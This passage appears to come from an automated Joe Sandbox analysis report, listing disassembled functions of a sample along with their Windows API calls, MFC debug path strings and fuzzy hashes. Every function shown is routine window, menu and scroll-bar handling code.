                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MenuMessage$AppendPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
                                • API String ID: 4274889364-337023061
                                • Opcode ID: 2586e378a4bf07b52dbda9506eadd81cdb229e94d0ea98e9826f280a6357342f
                                • Instruction ID: 3a97d15dbe69d31c260e589436a768a37ee1c24b363f22e22db80c2b9ba1b813
                                • Opcode Fuzzy Hash: 2586e378a4bf07b52dbda9506eadd81cdb229e94d0ea98e9826f280a6357342f
                                • Instruction Fuzzy Hash: 8CF08275608208AB8714CF98D954D9EB7FCEF48300B108149FA0983340D635EE11DB65
                                APIs
                                • IsWindow.USER32(?), ref: 00708050
                                • SetScrollPos.USER32(?,00000002,?,006FB478), ref: 0070807F
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070805F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitScrollWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 300521384-1404496517
                                • Opcode ID: ec7e17d7c57c4d7481b5e260706dfa3b1d2b5160653dbf1e8c591fb840db8406
                                • Instruction ID: 7f8fe49dcf8c8247190c25882640f21024d82bde9a34e8a4869e025d626a2673
                                • Opcode Fuzzy Hash: ec7e17d7c57c4d7481b5e260706dfa3b1d2b5160653dbf1e8c591fb840db8406
                                • Instruction Fuzzy Hash: 86F0A0B9704208FFC714CB94C949E6A77E8FB48300F204248FA0897281DA75DD009B91
                                APIs
                                • IsWindow.USER32(?), ref: 007080A0
                                • GetScrollRange.USER32(?,00000002,?,006FB598), ref: 007080CF
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 007080AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitRangeScrollWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 432955539-1404496517
                                • Opcode ID: ef5cf7cca9e7edbf284b668291b2cb81403d77323682eebd82b256b49e15b94b
                                • Instruction ID: 68d0562193a434abd9d5e9141432b7f518296223203fdd2115ebccdca63652e9
                                • Opcode Fuzzy Hash: ef5cf7cca9e7edbf284b668291b2cb81403d77323682eebd82b256b49e15b94b
                                • Instruction Fuzzy Hash: 9EF0A0B5604208FBC714DB94C949E6A77A8FB48300F104248FA0897381DA75DD009B95
                                APIs
                                • IsWindow.USER32(?), ref: 00707930
                                • SendMessageA.USER32(?,00000148,?,00000000), ref: 00707962
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070793F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitSendWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 2781468842-1404496517
                                • Opcode ID: d136de09f90f2586d4c2284a5329e30fab12eac0fc154cd56729dcd50e2bed77
                                • Instruction ID: 654f5bea791e6dd4c16f6bacdde12a7fc40908b6d4971a3e2f0f284969961acb
                                • Opcode Fuzzy Hash: d136de09f90f2586d4c2284a5329e30fab12eac0fc154cd56729dcd50e2bed77
                                • Instruction Fuzzy Hash: 82F03075A14208FBC718DB94DD4AD6A77ACFB48350F204259F90897280DA75ED00DB94
                                APIs
                                • IsWindow.USER32(?), ref: 00706A00
                                • SendMessageA.USER32(?,00000080,?,?), ref: 00706A32
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 00706A0F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitSendWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 2781468842-1404496517
                                • Opcode ID: c4c81b26963643f70a518bb7569abefa2c84b322d20916710bece4e29e6b7706
                                • Instruction ID: 9fe595cf00d710020edd7b3ccb5f057ae6749f25c70d73c04d7770277e25e255
                                • Opcode Fuzzy Hash: c4c81b26963643f70a518bb7569abefa2c84b322d20916710bece4e29e6b7706
                                • Instruction Fuzzy Hash: 11F030B5704208FBC714DB94DD55E6A77ACFF48350F208249FE08AB381DA75DD109B95
                                APIs
                                • IsWindow.USER32(?), ref: 006F8300
                                • SetWindowPlacement.USER32(?,?), ref: 006F8332
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F830F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPlacementPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 1566261920-4102074842
                                • Opcode ID: 579b987b50323ef6dee2e53adb2d4eb653ce1f98b4b3dab60cea74b811ae7c72
                                • Instruction ID: 1040f756d4c3bbde8268bddde8dd985bbc68ebec8bd3af8fc0229fb4dc6f39ba
                                • Opcode Fuzzy Hash: 579b987b50323ef6dee2e53adb2d4eb653ce1f98b4b3dab60cea74b811ae7c72
                                • Instruction Fuzzy Hash: F5F030B6A04208EFC714CF94E945D6A77A9FF48740F144198FE0897351DB75DD00DB54
                                APIs
                                • IsWindow.USER32(?), ref: 006F82B0
                                • GetWindowPlacement.USER32(?,?), ref: 006F82E2
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F82BF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPlacementPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 1566261920-4102074842
                                • Opcode ID: 951e7ca21e6a44c3481c993cfd435656f3a627a8094f7572240d4da464749709
                                • Instruction ID: eeb179e9338d4a9dbd734896962652d69835f36dea7b8ece36c7cb92ac73f98f
                                • Opcode Fuzzy Hash: 951e7ca21e6a44c3481c993cfd435656f3a627a8094f7572240d4da464749709
                                • Instruction Fuzzy Hash: BCF0A0B5604208EFD714CF94E948DAA77A9FF48350F104188FE0897341CB31EE00DB95
                                APIs
                                • IsWindow.USER32(?), ref: 00706680
                                • ShowScrollBar.USER32(00000003,00000003,006FB62A,?,006FB62A,00000003,?), ref: 007066AD
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070668F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitScrollShowWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 3206399544-1404496517
                                • Opcode ID: af9893765fe8a64162d2e1fe1b16ac2b6dad12c00e9197064e03d50f3f1e7748
                                • Instruction ID: 6c26331f503f04e633f5438d55d8d0a085cd3dbda6385cfa3786fa38d58476d5
                                • Opcode Fuzzy Hash: af9893765fe8a64162d2e1fe1b16ac2b6dad12c00e9197064e03d50f3f1e7748
                                • Instruction Fuzzy Hash: 1EF030B5604208EBC718DB94D955D5A77ECBF48340B104288F908D7241EA36ED109BA4
                                APIs
                                • List.LIBCMTD ref: 0070264F
                                  • Part of subcall function 00701E70: GetModuleHandleA.KERNEL32(00000000,00000000,?,00701E48,InitCommonControlsEx,?,?,007005DC,00000008), ref: 00701E8E
                                  • Part of subcall function 00701E70: LoadLibraryA.KERNEL32(00000000,?,00701E48,InitCommonControlsEx,?,?,007005DC,00000008), ref: 00701EAF
                                • GetProcAddress.KERNEL32(00000000,InitCommonControls), ref: 00702669
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleLibraryListLoadModuleProc
                                • String ID: InitCommonControls
                                • API String ID: 1952004650-2489084829
                                • Opcode ID: fdf59b9ac0f46b72f804da80e431d49f31c812c1de86612c96686792bc704ca8
                                • Instruction ID: 2da6ac535cdcce877609b25e32388ea4dca38d95adc7b0389f7df368d289f74c
                                • Opcode Fuzzy Hash: fdf59b9ac0f46b72f804da80e431d49f31c812c1de86612c96686792bc704ca8
                                • Instruction Fuzzy Hash: A1F0E570600208FBCB08EF98D855D6E77BAFF84340B104098F80697382CA34EF01DBA4
                                APIs
                                • IsWindow.USER32(?), ref: 00706770
                                • GetWindow.USER32(?,00000004), ref: 00706799
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070677F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 3554874738-1404496517
                                • Opcode ID: 935cf1f7dce271f38294a3a4e5a257542340e3a2ee0eb7116dae2d490ad46dbb
                                • Instruction ID: 03301d457c78617dcd5df19c56d2c3391bcc5ff1dc33dc427ed737e85350b43b
                                • Opcode Fuzzy Hash: 935cf1f7dce271f38294a3a4e5a257542340e3a2ee0eb7116dae2d490ad46dbb
                                • Instruction Fuzzy Hash: 6AE0EDB2604208EBC714DFA4D955D6A77ACEF88740B24025CFA08D7281DB39DE21ABA5
                                APIs
                                • IsWindow.USER32(006EC480), ref: 007077D0
                                • SendMessageA.USER32(006EC480,0000014E,?,00000000), ref: 00707800
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 007077DF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitSendWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 2781468842-1404496517
                                • Opcode ID: f6207922235452d4cc5def17fee2c2ec4f87081a3cb7fd110a2b563fe2e52b4a
                                • Instruction ID: 2cf4d8887e0ed5654f35cbda5f4be0a04ce8da81df274880173d9f9d7f3bd903
                                • Opcode Fuzzy Hash: f6207922235452d4cc5def17fee2c2ec4f87081a3cb7fd110a2b563fe2e52b4a
                                • Instruction Fuzzy Hash: 9FF0E575604208FBD318CB50DD45E6A77BDEB48744F200148FE089B280C675DD01DA94
                                APIs
                                • IsWindow.USER32(?), ref: 00707980
                                • SendMessageA.USER32(?,00000149,?,00000000), ref: 007079B0
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070798F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitSendWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 2781468842-1404496517
                                • Opcode ID: 60368116d9eeb1d1c58e3f6b9f694568a8dd799059e9c0ef992c1bcc4371d3e6
                                • Instruction ID: db5276168d48a11f992d05f1c38f5018539e460daef5ff161d25c29a0d2fa504
                                • Opcode Fuzzy Hash: 60368116d9eeb1d1c58e3f6b9f694568a8dd799059e9c0ef992c1bcc4371d3e6
                                • Instruction Fuzzy Hash: 1FF06576614208FBD714CB95DD45E6B77BDEB48740F204159FE089B280D635ED01DA94
                                APIs
                                • IsWindow.USER32(?), ref: 00705AC0
                                • GetSystemMenu.USER32(?,?,?,?,006D9A8B,00000000,ED5B0DC1), ref: 00705AE6
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 00705ACC
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$MenuPeekPostQuitSystemWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 1700769046-1404496517
                                • Opcode ID: 8c1398801246165e9b51b9c976e2dbf07e54482de4f56de874fee5282be816ab
                                • Instruction ID: 9a6807c82d86b04e5a4f025a83130dbd4eebf7d272f8b598d108d9de08394e83
                                • Opcode Fuzzy Hash: 8c1398801246165e9b51b9c976e2dbf07e54482de4f56de874fee5282be816ab
                                • Instruction Fuzzy Hash: E2E0E5B5A00208EBC724DF94D989D2B37ECEF48340B204248FA0997240DA39DD019F64
                                APIs
                                • List.LIBCMTD ref: 00701E2F
                                  • Part of subcall function 00701E70: GetModuleHandleA.KERNEL32(00000000,00000000,?,00701E48,InitCommonControlsEx,?,?,007005DC,00000008), ref: 00701E8E
                                  • Part of subcall function 00701E70: LoadLibraryA.KERNEL32(00000000,?,00701E48,InitCommonControlsEx,?,?,007005DC,00000008), ref: 00701EAF
                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00701E49
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleLibraryListLoadModuleProc
                                • String ID: InitCommonControlsEx
                                • API String ID: 1952004650-2357626986
                                • Opcode ID: 1144d14b58b2597f100b4c70d6eacf36dc4512a03c663faab2ed49054eda6d65
                                • Instruction ID: 817314b68c57fe5c6f73a9e8a6ce4475d85a5bceacef08d9b6e3a40368d40f81
                                • Opcode Fuzzy Hash: 1144d14b58b2597f100b4c70d6eacf36dc4512a03c663faab2ed49054eda6d65
                                • Instruction Fuzzy Hash: D5F0A070600208FFCB08DF98D85596E77B9AF85344B5040A8F8069B382CA34EF01DBB5
                                APIs
                                • IsMenu.USER32(?), ref: 00719EF0
                                • GetSubMenu.USER32(?,?), ref: 00719F19
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl, xrefs: 00719EFF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MenuMessage$PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
                                • API String ID: 1738441686-337023061
                                • Opcode ID: 7f5645374b4b514a6d75fc3009308f74350925ffc599676499f1d7afa9c7d917
                                • Instruction ID: 598317c861ce2c21c6421007f3717e3d20b6c30ba3d4f7e7a1f332ac92917956
                                • Opcode Fuzzy Hash: 7f5645374b4b514a6d75fc3009308f74350925ffc599676499f1d7afa9c7d917
